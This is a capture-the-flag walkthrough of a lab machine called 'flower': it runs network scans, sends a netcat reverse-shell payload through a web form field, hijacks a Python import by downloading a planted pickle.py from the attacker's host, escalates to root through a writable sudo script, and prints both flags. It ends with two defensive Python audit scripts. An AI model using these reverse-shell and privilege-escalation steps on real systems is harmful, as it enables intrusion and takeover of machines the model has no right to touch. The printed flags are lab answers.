Hacking practice notes...

1. Scan the subnet

```console
┌──(root㉿kali)-[/home/ace/桌面]
└─# nmap -sP 192.168.56.127/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 12:11 CST
Nmap scan report for 192.168.56.1
Host is up (0.00029s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00063s latency).
MAC Address: 08:00:27:9A:22:84 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.143
Host is up (0.00043s latency).
MAC Address: 08:00:27:58:FE:CD (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.127
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 35.02 seconds
```

2. Scan the target's ports

```console
┌──(root㉿kali)-[/home/ace/桌面]
└─# nmap -sC -sV -A -p- 192.168.56.143
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-11 12:12 CST
Nmap scan report for 192.168.56.143
Host is up (0.0013s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:58:FE:CD (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.30 ms 192.168.56.143

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.79 seconds
```

3. Visit the web page

[screenshot: image-20230811121615838]

The port scan turned up only this one entry point (port 80), so Burp Suite is probably going to be involved.

[screenshot: image-20230811122303482]

Modifying the value of flower gets us a reverse shell.

The payload, base64-encoded before it is sent:

```
system("nc -e /bin/bash 192.168.56.127 4444")
```

[screenshot: image-20230811122837851]

[screenshot: image-20230811122858500]

4. Switching users

```
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)
www-data@flower:/home/rose/diary$
```

Found this: diary.py imports pickle. Since the diary directory is world-writable and www-data can run diary.py as rose via sudo, a pickle.py dropped next to the script will be imported in place of the standard-library module.

Python library hijacking

```console
www-data@flower:/home/rose/diary$ wget http://192.168.56.127:8000/pickle.py
wget http://192.168.56.127:8000/pickle.py
--2023-08-11 00:41:10--  http://192.168.56.127:8000/pickle.py
Connecting to 192.168.56.127:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 33 [text/x-python]
Saving to: ‘pickle.py’

pickle.py           100%[===================>]      33  --.-KB/s    in 0s

2023-08-11 00:41:10 (9.32 MB/s) - ‘pickle.py’ saved [33/33]

www-data@flower:/home/rose/diary$ ls
ls
diary.py  pickle.py
www-data@flower:/home/rose/diary$ sudo -l
sudo -l
Matching Defaults entries for www-data on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
    (rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
< -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$
```
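An added example, not part of the original write-up, that reproduces the import-resolution behaviour behind this step in a throwaway directory and shows the checks a defender would run: flagging stdlib-named `.py` files beside a sudo-run script, flagging a group- or world-writable script directory, and running the interpreter with `-I` (isolated mode) so the script's own directory is left off `sys.path`. The `diary.py`/`pickle.py` layout is constructed in a temp directory; the stand-in shadow module only defines a constant.

```python
# Added example (not from the original write-up): why a pickle.py dropped into
# the script's own directory shadows the standard-library module, plus two
# audit checks and the -I mitigation. All paths and files are constructed.
import os
import stat
import subprocess
import sys
import tempfile

# sys.stdlib_module_names exists from Python 3.10; fall back to a small set.
STDLIB_NAMES = getattr(sys, "stdlib_module_names",
                       frozenset({"pickle", "os", "sys", "json", "subprocess"}))


def shadowed_stdlib_modules(script_path):
    """Return stdlib module names that a .py file beside script_path would shadow.

    Python puts the directory of the script being run at sys.path[0], ahead of
    the standard library, so /home/rose/diary/pickle.py wins over the real pickle.
    """
    script_dir = os.path.dirname(os.path.abspath(script_path))
    found = []
    for entry in os.listdir(script_dir):
        name, ext = os.path.splitext(entry)
        if ext == ".py" and name in STDLIB_NAMES and entry != os.path.basename(script_path):
            found.append(name)
    return sorted(found)


def script_dir_writable_by_others(script_path):
    """True if the script's directory is group- or world-writable (like drwxrwxrwx diary/)."""
    mode = os.stat(os.path.dirname(os.path.abspath(script_path))).st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def pickle_loaded_from_script_dir(script_dir, isolated):
    """Run a probe script that imports pickle and report whether the module came
    from script_dir. With -I (Python 3.4+) the script directory is not added to
    sys.path, so the shadowing file is ignored and the real stdlib pickle loads.
    """
    probe = os.path.join(script_dir, "probe.py")
    with open(probe, "w") as fh:
        fh.write("import os, pickle\nprint(os.path.realpath(pickle.__file__))\n")
    cmd = [sys.executable] + (["-I"] if isolated else []) + [probe]
    loaded = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout.strip()
    return os.path.dirname(loaded) == os.path.realpath(script_dir)


def demo():
    """Build a constructed diary/ directory with a harmless pickle.py and run the checks."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o777)  # mirror the drwxrwxrwx diary directory seen on the box
        with open(os.path.join(d, "pickle.py"), "w") as fh:
            fh.write("SHADOW = True\n")  # stand-in for the dropped module; does nothing
        diary = os.path.join(d, "diary.py")
        with open(diary, "w") as fh:
            fh.write("import pickle\n")
        return {
            "shadowed": shadowed_stdlib_modules(diary),
            "dir_writable": script_dir_writable_by_others(diary),
            "normal_run": pickle_loaded_from_script_dir(d, isolated=False),
            "isolated_run": pickle_loaded_from_script_dir(d, isolated=True),
        }


if __name__ == "__main__":
    print(demo())
```

The two audit functions are what a sudoers review would run against `/home/rose/diary/diary.py`; the `-I` comparison shows that a rule written as `/usr/bin/python3 -I /home/rose/diary/diary.py` would not have picked up the shadow module, though the world-writable directory would still need fixing.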

first flag:

```console
rose@flower:~/diary$ cd ..
cd ..
rose@flower:~$ cat user.txt
cat user.txt
HMV{R0ses_are_R3d$}
rose@flower:~$
```

5. root

```console
rose@flower:~$ /bin/bash /home/rose/.plantbook
/bin/bash /home/rose/.plantbook
Hello, write the name of the flower that u found
rose
rose
Nice, rose submitted on : Fri Aug 11 00:44:41 EDT 2023
```

The timestamp in that output shows the script calls the date command.

Since .plantbook is owned by rose, we can try simply overwriting it.

```console
rose@flower:~$ echo "/bin/bash" >.plantbook
echo "/bin/bash" >.plantbook
rose@flower:~$ ls
ls
diary  user.txt
rose@flower:~$ ls -al
ls -al
total 32
drwxrwxr-x 3 rose rose 4096 Aug 11 00:49 .
drwxr-xr-x 3 root root 4096 Nov 30  2020 ..
-rw-r--r-- 1 rose rose  220 Nov 30  2020 .bash_logout
-rw-r--r-- 1 rose rose 3526 Nov 30  2020 .bashrc
-rw-r--r-- 1 rose rose   10 Aug 11 00:49 .plantbook
-rw-r--r-- 1 rose rose  807 Nov 30  2020 .profile
drwxrwxrwx 3 rose rose 4096 Aug 11 00:41 diary
-rw------- 1 rose rose   20 Nov 30  2020 user.txt
rose@flower:~$ /bin/bash /home/rose/.plantbook
/bin/bash /home/rose/.plantbook
rose@flower:~$ ls
ls
diary  user.txt
rose@flower:~$ id
id
uid=1000(rose) gid=1000(rose) groups=1000(rose),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
rose@flower:~$ sudo /bin/bash /home/rose/.plantbook
sudo /bin/bash /home/rose/.plantbook
root@flower:/home/rose# ls
ls
diary  user.txt
```
```console
root@flower:/home/rose# cat /root/root.txt
cat /root/root.txt
HMV{R0ses_are_als0_black.}
root@flower:/home/rose#
```
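An added example, not from the original write-up, of the review a defender would run over the two sudo rules seen on this box (`/usr/bin/python3 /home/rose/diary/diary.py` and `/bin/bash /home/rose/.plantbook`): for a rule of the form interpreter plus script, check whether the invoking user can rewrite the script file or anything in its directory. The file layout is rebuilt in a temp directory owned by the current user, which stands in for rose, so the findings reproduce the box's conditions without reading a real sudoers file. The ownership-based check ignores group membership; that simplification and the interpreter list are assumptions of this example.

```python
# Added example (not from the original write-up): audit the script behind a
# sudo rule for "interpreter + script" the way a hardening review would.
# Layout is constructed in a temp dir; nothing here reads /etc/sudoers.
import os
import shlex
import stat
import tempfile

# Interpreters that make the second argv token the thing actually being run.
INTERPRETERS = {"/usr/bin/python3", "/bin/bash", "/bin/sh"}


def script_from_rule_command(command):
    """Return the script path from a sudo command such as '/bin/bash /home/rose/.plantbook'.

    A rule naming an interpreter plus a script is only as strong as the script
    file, so the audit must look at the second token, not the interpreter.
    """
    argv = shlex.split(command)
    if len(argv) >= 2 and argv[0] in INTERPRETERS:
        return argv[1]
    return None


def modifiable_by(path, invoker_uid):
    """True if the user allowed to invoke the rule could change this path.

    Owner == invoker (rose owns .plantbook and diary/), a non-root owner in
    general, or group/other write bits (drwxrwxrwx diary/) all count.
    Group membership is deliberately not evaluated here (assumption).
    """
    st = os.stat(path)
    if st.st_uid == invoker_uid:
        return True
    if st.st_uid != 0:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_rule(command, invoker_uid):
    """Return findings for one sudo command; an empty list means it looks sane."""
    findings = []
    script = script_from_rule_command(command)
    if script is None:
        return findings
    if modifiable_by(script, invoker_uid):
        findings.append(f"script {script} can be rewritten by uid {invoker_uid}")
    parent = os.path.dirname(script)
    if modifiable_by(parent, invoker_uid):
        findings.append(f"directory {parent} can be modified by uid {invoker_uid} "
                        "(file replacement or Python module shadowing)")
    return findings


def demo():
    """Recreate the home-directory layout from the ls -al output and audit both rules."""
    me = os.getuid()  # current user plays the role of rose
    with tempfile.TemporaryDirectory() as home:
        diary = os.path.join(home, "diary")
        os.mkdir(diary)
        os.chmod(diary, 0o777)            # drwxrwxrwx diary/
        diary_py = os.path.join(diary, "diary.py")
        open(diary_py, "w").close()
        plantbook = os.path.join(home, ".plantbook")
        open(plantbook, "w").close()
        os.chmod(plantbook, 0o644)        # -rw-r--r-- rose rose .plantbook
        return {
            "diary": audit_rule(f"/usr/bin/python3 {diary_py}", me),
            "plantbook": audit_rule(f"/bin/bash {plantbook}", me),
            "safe": audit_rule("/usr/bin/id", me),
        }


if __name__ == "__main__":
    for rule, findings in demo().items():
        print(rule, findings or "ok")
```

Both rules produce findings because the script and its parent directory belong to the very user the rule is granted to; the fix is the usual one of keeping sudo-run scripts root-owned in a root-owned, non-writable directory, which also closes the module-shadowing path used in step 4.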